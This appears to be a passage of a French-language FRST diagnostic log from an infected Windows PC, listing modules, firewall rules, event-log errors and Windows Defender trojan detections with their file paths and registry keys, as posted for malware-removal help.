2018-12-13 09:54 - 2018-12-13 10:05 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-09-15 17:40 - 2018-09-15 17:40 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\ImagePipelineNative.dll
2018-12-13 09:54 - 2018-12-13 09:55 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\ChakraBridge.dll
2019-01-11 15:44 - 2019-01-11 15:44 - 005172224 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\YourPhone.exe
2019-01-11 15:44 - 2019-01-11 15:44 - 002172928 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\YourPhone.AppCore.dll
2019-01-11 15:44 - 2019-01-11 15:44 - 001795584 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\PhoneContentDataStore.dll
2018-12-05 22:40 - 2018-12-05 22:41 - 001004032 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2019-01-11 15:44 - 2019-01-11 15:44 - 002907136 _____ () C:\Program Files\WindowsApps\Microsoft.YourPhone_1.0.20094.0_x64__8wekyb3d8bbwe\PhoneCommunicationAppService.dll
2018-12-05 22:15 - 2018-12-05 22:24 - 000194048 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe\WinStore.Preview.dll
2018-12-05 22:15 - 2018-12-05 22:17 - 002538056 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-12-05 22:15 - 2018-12-05 22:17 - 001754112 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl.dll
2019-02-03 16:45 - 2019-02-03 16:45 - 003010048 _____ () C:\Users\yassine\AppData\Local\Temp\wup\wup.exe
2019-02-03 15:42 - 2019-02-03 15:42 - 000328704 _____ () C:\Users\yassine\AppData\Local\4db6a491-c473-4d68-bbbe-621a79d406bf\E81.tmp.exe
2017-11-02 11:51 - 2017-11-02 11:51 - 000199864 _____ () C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
2019-01-23 21:31 - 2019-01-23 21:31 - 004527616 _____ () C:\Windows\rss\csrss.exe
2019-01-06 14:14 - 2019-01-06 14:17 - 000478720 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2019-01-06 14:14 - 2019-01-06 14:17 - 065905152 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2018-12-05 22:32 - 2018-12-06 00:54 - 003715072 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll
2019-01-06 14:14 - 2019-01-06 14:17 - 000010752 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll
2018-12-05 22:32 - 2018-12-06 01:04 - 002523136 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll
2018-12-05 22:32 - 2018-12-06 01:06 - 000036352 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\WinMLWrapper.UWP.dll
2018-12-05 22:32 - 2018-12-06 01:03 - 002480640 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\opencv_imgproc320.dll
2018-12-05 22:32 - 2018-12-06 01:03 - 002280960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\opencv_core320.dll
2018-12-05 22:32 - 2018-12-06 01:04 - 002283008 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\TrackingDLLUWP.dll
2019-01-06 14:14 - 2019-01-06 14:17 - 014190080 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll
2018-12-05 22:32 - 2018-12-06 00:52 - 003569152 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2019-01-06 14:14 - 2019-01-06 14:16 - 002871296 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll
2018-12-05 22:32 - 2018-12-06 01:04 - 000973312 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2018-09-15 17:42 - 2018-09-15 17:42 - 004584960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2019-01-06 14:14 - 2019-01-06 14:17 - 000146432 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18112.17430.0_x64__8wekyb3d8bbwe\SKU.dll
2018-09-15 08:28 - 2018-09-15 08:28 - 000474624 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-13 10:37 - 2018-12-13 10:37 - 002801152 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-09-15 08:28 - 2018-09-15 08:28 - 001740288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
AlternateDataStreams: C:\Users\yassine:.repos [6509722]
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
==================== Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
IE trusted site: HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1848641037-2696689444-97599420-1001\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts contenu: ===============================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2018-09-15 08:31 - 2019-01-23 21:28 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts
2019-01-07 18:31 - 2019-01-07 18:31 - 000000516 _____ C:\Windows\system32\drivers\etc\hosts.ics
192.168.137.1 DESKTOP-6CA5L0V.mshome.net # 2024 1 6 6 17 31 11 291
192.168.137.172 Galaxy-J5-pro-2017.mshome.net # 2019 1 1 14 17 31 11 291
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-1848641037-2696689444-97599420-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\yassine\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\774228.jpg
DNS Servers: Le média n'est pas connecté à internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [{5DAE91DF-B96F-4ACC-BBA8-13E236F9F9D7}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\PDS.EXE ()
FirewallRules: [{6F375AD5-7CD5-4D78-A8C0-21B6E7E17E9B}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\PDS.EXE ()
FirewallRules: [{5FA53375-9962-4C3D-A692-AD995DA42F8F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FD0F659D-1BDE-4806-AD4E-B9046F8BA160}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{BCEA56EB-3FC9-423A-8393-91EA3B79B688}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\\PDS.EXE ()
FirewallRules: [{EE422DA2-8285-4ACF-854E-118F320B13EF}] => (Allow) C:\Program Files (x86)\Labcenter Electronics\Proteus 8 Professional\BIN\\PDS.EXE ()
FirewallRules: [TCP Query User{EEE5C719-A918-46A2-8173-895BB6A949BE}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe ()
FirewallRules: [UDP Query User{A98A6D55-785A-4DBA-98E8-192B5393824E}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\orbixd.exe ()
FirewallRules: [TCP Query User{1147C930-17C3-4F20-BB67-6F35B05EA7E9}C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe] => (Allow) C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [UDP Query User{72F8C239-A040-4DED-8595-D5B8AB56FCD4}C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe] => (Allow) C:\program files\windowsapps\arduinollc.arduinoide_1.8.19.0_x86__mdqgnx93n4wtt\java\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [TCP Query User{ED7214C9-1885-4FA2-BB35-11E96440D99B}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe (Dassault Systemes)
FirewallRules: [UDP Query User{47B5A2E7-EFBD-4770-9494-3B4B2FDDE0CA}C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe] => (Block) C:\program files (x86)\dassault systemes\b20\intel_a\code\bin\cnext.exe (Dassault Systemes)
FirewallRules: [{7CE3247F-7293-4CB8-84B1-9E604F0A346A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc -> Google Inc.)
FirewallRules: [{ACEF1950-DF65-4ABB-98F0-E4C500D8EB61}] => (Allow) C:\Users\yassine\AppData\Local\Programs\Opera\57.0.3098.106\opera.exe Pas de fichier
FirewallRules: [TCP Query User{4BF89AA7-8436-4D11-B6B5-9A5BFACF9CCF}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [UDP Query User{48B26B9C-FB9C-47BC-8ED6-BD1484CFC449}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1DFFFDD1-8639-46A5-8C71-76236EA5C28D}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Pas de fichier
FirewallRules: [{ADE937A0-7000-4793-A829-175D38914245}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe Pas de fichier
FirewallRules: [{699C9CDD-4422-4EBC-B4B6-B5D0FE4A1338}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{34A002D8-230B-4728-9A2A-5B387B824B6E}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{61D45922-9241-4669-989B-7BF83455FBB6}] => (Allow) C:\Users\yassine\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [{7FB731D3-2894-4265-8DD3-ACD9D43F6B14}] => (Allow) C:\Users\yassine\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [TCP Query User{2B8F852E-AB35-4C68-9D97-D36A63BFE6F5}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [UDP Query User{97661453-1CE3-4052-B74B-A7915B396643}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [TCP Query User{252C3920-0514-4173-AF82-F6F9866885B9}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [UDP Query User{9AA6BDF4-D934-42F6-85E3-47B847E9647C}C:\windows\syswow64\svchost.exe] => (Block) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
==================== Points de restauration =========================
19-01-2019 21:19:17 Point de contrôle planifié
29-01-2019 01:57:12 Point de contrôle planifié
==================== Éléments en erreur du Gestionnaire de périphériques =============
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (02/04/2019 06:58:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme svchost.exe version 10.0.17763.1 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : 97c
Heure de début : 01d4bbcee36f79fa
Heure d'arrêt : 4294967295
Chemin d'accès à l'application : C:\Windows\System32\svchost.exe
ID de rapport : fde4b0f3-d9e0-4bd2-a401-21b68c582971
Nom complet du package défectueux :
ID de l'application relative à un package défectueux :
Type de blocage : Cross-thread
Error: (02/03/2019 10:17:10 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 10:00:27 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 09:59:55 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 07:57:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante cloudnet.exe, version : 7.2.1.1, horodatage : 0x5c56f8a8
Nom du module défaillant : ntdll.dll, version : 10.0.17763.194, horodatage : 0xf3450dbf
Code d’exception : 0xc0000374
Décalage d’erreur : 0x000e0e23
ID du processus défaillant : 0x2c54
Heure de début de l’application défaillante : 0x01d4bbcf16628093
Chemin d’accès de l’application défaillante : C:\Users\yassine\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll
ID de rapport : b0515ac7-bd35-4c2f-9f50-c2e1c2304abc
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Error: (02/03/2019 07:55:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme mingw-get-setup.exe version 0.603.24357.1 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : c090
Heure de début : 01d4bbd3824a126f
Heure d'arrêt : 4294967295
Chemin d'accès à l'application : C:\Users\yassine\Desktop\mingw-get-setup.exe
ID de rapport : d9e1385a-ffb5-46b3-a7a8-4dbc76a0a4b1
Nom complet du package défectueux :
ID de l'application relative à un package défectueux :
Type de blocage : Top level window is idle
Error: (02/03/2019 07:54:04 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (02/03/2019 05:56:42 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0xC004F074
Arguments de la ligne de commande :
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Erreurs système:
=============
Error: (02/04/2019 06:54:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Windows.Internal.WebRuntime.ContentProcess#{00041402-0001-0000-D4F6-D20500000000} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 06:54:07 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Windows.Internal.WebRuntime.ContentProcess#{00031402-0001-0000-D4F6-D20500000000} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 06:50:33 PM) (Source: DCOM) (EventID: 10005) (User: AUTORITE NT)
Description: DCOM a reçu l’erreur « 1053 » lors de la tentative de démarrage du service camsvc avec les arguments « Non disponible » pour exécuter le serveur :
Windows.Internal.CapabilityAccess.Management.CapabilityConsentManager
Error: (02/04/2019 06:50:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Service Gestionnaire d’accès aux fonctionnalités n’a pas pu démarrer en raison de l’erreur :
Le service n’a pas répondu assez vite à la demande de lancement ou de contrôle.
Error: (02/04/2019 06:50:33 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la connexion du service Service Gestionnaire d’accès aux fonctionnalités.
Error: (02/04/2019 12:03:12 AM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT)
Description: Le serveur {1F87137D-0E7C-44D5-8C73-4EFFB68962F2} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 12:01:02 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Microsoft.OneConnect_5.1809.2571.0_x64__8wekyb3d8bbwe!App.AppXe8pdgw5syxe8pgccbk3mcn5hanwamr0e.mca ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (02/04/2019 12:00:08 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6CA5L0V)
Description: Le serveur Windows.Internal.WebRuntime.ContentProcess#{00101402-0001-0000-BC45-B70100000000} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Windows Defender:
===================================
Date: 2019-02-03 16:26:03.766
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Occamy.C&threatid=2147726780&enterprise=0
Nom : Trojan:Win32/Occamy.C
ID : 2147726780
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Program Files (x86)\OVER\699089283.exe; file:_C:\Program Files\windows nt\48BAADK4HSCLXTEJCV8DNDP9\rkNS+7X#TO.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\bonhhfdbonp; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\OMEWPRODUCT_; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\bonhhfdbonp; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\OMEWPRODUCT_
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Utilisateur
Utilisateur : DESKTOP-6CA5L0V\yassine
Nom du processus : Unknown
Version de la signature : AV: 1.285.776.0, AS: 1.285.776.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:47:30.555
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Nom : Trojan:Win32/Fuerboos.C!cl
ID : 2147723654
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Users\yassine\AppData\Local\Temp\E81.tmp.exe
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:47:30.546
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=!#UACTrigger.A&threatid=268476516&enterprise=0
Nom : !#UACTrigger.A
ID : 268476516
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : amsiuac:_pid:00000C6C
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:42:43.226
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=!#UACTrigger.A&threatid=268476516&enterprise=0
Nom : !#UACTrigger.A
ID : 268476516
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : amsiuac:_pid:00000C6C
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Fournisseur AMSI UAC
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-03 15:42:43.225
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Nom : Trojan:Win32/Fuerboos.C!cl
ID : 2147723654
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : amsiuac:_pid:00000C6C
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Fournisseur AMSI UAC
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.285.669.0, AS: 1.285.669.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.15600.4, NIS: 0.0.0.0
Date: 2019-02-02 16:47:37.301
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.285.669.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15600.4
Code d’erreur : 0x80072ee2
Description de l’erreur : Le délai imparti à l’opération est dépassé
Date: 2019-02-02 16:47:37.300
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.285.669.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Logiciel anti-espion
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15600.4
Code d’erreur : 0x80072ee2
Description de l’erreur : Le délai imparti à l’opération est dépassé
Date: 2019-02-02 16:47:37.299
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.285.669.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15600.4
Code d’erreur : 0x80072ee2
Description de l’erreur : Le délai imparti à l’opération est dépassé
Date: 2019-01-29 11:37:58.229
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.3579.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80072ee7
Description de l’erreur : L’adresse ou le nom de serveur n’a pas pu être résolu
Date: 2019-01-29 11:37:58.229
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.3579.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Logiciel anti-espion
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80072ee7
Description de l’erreur : L’adresse ou le nom de serveur n’a pas pu être résolu
CodeIntegrity:
===================================
Date: 2019-01-23 21:36:40.254
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SearchIndexer.exe) attempted to load \Device\HarddiskVolume4\ProgramData\Polygen\DingZuntam.dll that did not meet the Microsoft signing level requirements.
Date: 2019-01-23 19:41:56.297
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-23 19:41:56.292
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-23 19:41:56.281
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-23 19:41:56.198
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVG\Antivirus\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Pentium(R) CPU 2020M @ 2.40GHz
Pourcentage de mémoire utilisée: 53%
Mémoire physique - RAM - totale: 3985.27 MB
Mémoire physique - RAM - disponible: 1853.17 MB
Mémoire virtuelle totale: 7697.27 MB
Mémoire virtuelle disponible: 5383.14 MB
==================== Lecteurs ================================
Drive c: () (Fixed) (Total:445.73 GB) (Free:317.71 GB) NTFS
\\?\Volume{7b4a6d6f-cf6d-494b-982e-33327e5cb2c1}\ () (Fixed) (Total:0 GB) (Free:0 GB)
